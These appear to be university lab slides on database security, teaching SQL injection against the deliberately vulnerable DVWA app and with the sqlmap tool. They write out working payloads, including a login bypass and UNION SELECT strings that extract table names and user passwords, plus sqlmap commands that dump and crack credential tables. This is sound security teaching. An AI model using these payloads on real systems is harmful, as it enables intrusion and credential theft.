Scribd
Upload
69 views9 pages

LAB - Chapter 9 - Database Security

Uploaded by

Trần Như Thiện
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
69 views9 pages

LAB - Chapter 9 - Database Security

Uploaded by

Trần Như Thiện
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

15/10/2024

 

Lecturer: Nguyễn Thị Thanh Vân – FIT - HCMUTE

 SQL Injection attacks


o Example
 Damn Vulnerable Web App – DVWA
o Examples
 Sqlmap
o Examples

15/10/2024 2

1
15/10/2024

 SQL Injections can do more harm than just by passing


the login algorithms. Some of the attacks include
o Deleting data
o Updating data
o Inserting data
o Executing commands on the server that can download and
install malicious programs such as Trojans
o Exporting valuable data such as credit card details, email, and
passwords to the attacker’s remote server
o Getting user login details etc

15/10/2024 3

 Crack username/password
o SQL query:
SELECT * FROM Users WHERE Username='$username' AND
Password='$password‘

o Type:
$username = 1' or '1' = '1$password = 1' or '1' = '1

o The query will be:


SELECT * FROM Users WHERE Username='1' OR '1' = '1'
AND Password='1' OR '1' = '1'
 => always true (OR 1=1) => the system has authenticated the user
without knowing the username and password.

15/10/2024 4

2
15/10/2024

 SQL query:
SELECT * FROM products WHERE id_product=$id_product
ex:
http://www.example.com/product.php?id=10

 Using the operators AND and OR.


SELECT * FROM products WHERE id_product=10 AND 1=2
Ex:
http://www.example.com/product.php?id=10 AND 1=2
=> there is no content available or a blank page.

 Then, send a true statement and check if there is a valid result:


Ex: http://www.example.com/product.php?id=10 AND 1=1

15/10/2024 5

 Damn Vulnerable Web App (DVWA) is a PHP/MySQL web


application that is damn vulnerable. Its main goals are to be an aid for
security professionals to test
 1.1 Download DVWA
 1.2 Create database and user in DVWA
 1.3 Config DVWA
 1.4 Setup basic database in DVWA
 1.5 Access DVWA
http://10.0.0.2/login.php
 Set DVWA Security Level: Low, Medium, High
o SQL Injection
o SQL Injection (Blind)

15/10/2024 6

3
15/10/2024

15/10/2024 7

15/10/2024 8

4
15/10/2024

 Basic Injection: 1
 Always True Scenario: %' or '0'='0
 Display Database Version :
o %' or 0=0 union select null, version() #
 Display Database User:
o %' or 0=0 union select null, user() #
 Display Database Name
o %' or 0=0 union select null, database() #
 Display all tables in information_schema
o %' and 1=0 union select null, table_name from
information_schema.tables #

15/10/2024 9

 Display all the user tables in information_schema


o %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
 Display all the columns fields in the information_schema
user table
o %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
 Display all the columns field contents in the
information_schema user table
o %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #

15/10/2024 10

5
15/10/2024

 Get important information in DVWA database: user/pass


with different level:
o Low
o Medium
o High

15/10/2024 11

 sqlmap is an open source penetration testing tool that


automates the process of
o detecting and exploiting SQL injection flaws
o taking over of database servers.
 It comes with a kick-ass detection engine
 Many niche features
o the ultimate penetration tester
o a broad range of switches lasting from database fingerprinting,
o over data fetching from the database,
o to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.
 Download and install Sqlmap
http://sqlmap.sourceforge.net/doc/README.html#s1
15/10/2024 12

6
15/10/2024

 Open firefox: add Tamper Data to Tool


o Select Tool\Tamper Data
o Start Tamper Data
 Or: using F12 to open
 Ex, Show in DVWA:

15/10/2024 13

 Run SQL injection


 Prepare: Tamper with request
o Copying the Referer URL (Ref)
Ex: “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”
o Copying the Cookie Information (Coo)
Ex: “PHPSESSID=lpb5g4uss9kp70p8jccjeks621;
set security=low”
 Run sqlmap to obtain the following pieces of information
o Obtain Database User For DVWA. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> -b --current-db --current-user
o Ex: ./sqlmap.py -u
"http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --
cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b
--current-db --current-user
Do you want to keep testing? Y => Result
15/10/2024 14

7
15/10/2024

 Run sqlmap
o Obtain Database Management Username and Password. Syntax:
./sqlmap.py –u <ref> --cookie=<Coo> --string="Surname" --users
--password
Use Dictionary Attack? Y
Dictionary Location? <Press Enter>
o Obtain db_hacker Database Privileges. Syntax:
./sqlmap.py –u <ref> --cookie=<Coo> -U db_hacker –privileges
o Obtain a list of all databases.
./sqlmap.py –u <ref> --cookie=<Coo> --dbs
o Obtain "dvwa" tables and contents
./sqlmap.py –u <ref> --cookie=<Coo> -D dvwa --tables
o Obtain columns for table dvwa.users
./sqlmap.py –u <ref> -- cookie=<Coo> -D dvwa -T users --columns15

 Run sqlmap
o Obtain Users and their Passwords from table dvwa.users. Syntax:
./sqlmap.py –u <ref> --cookie=<Coo> -D dvwa -T users -C
user,password --dump
Do you want to use the LIKE operator? Y
Recognize possible HASH values? Y
What's the dictionary location? <Press Enter>
Use common password suffixes? y

16

8
15/10/2024

 use sqlmap to obtain the following pieces of information:


o A list of Database Management Usernames and Passwords.
o A list of databases
o A list of tables for a specified database
o A list of users and passwords for a specified database table.

15/10/2024 17

1. DVWA: SQL Injection, SQL Injection Blind (2)


o Get important information in DVWA database such as: tables,
user/pass with different level: Low, Medium, High
2. Sqlmap: (2)
o Get important information in DVWA database: tables, user/pass
with different level: Low, Medium, High
o Database from other website, ex:
• http://testphp.vulnweb.com
3. Other Tools: (1)
o Hackbar (built-in web browser) -> vulnerable website.

15/10/2024 18

You might also like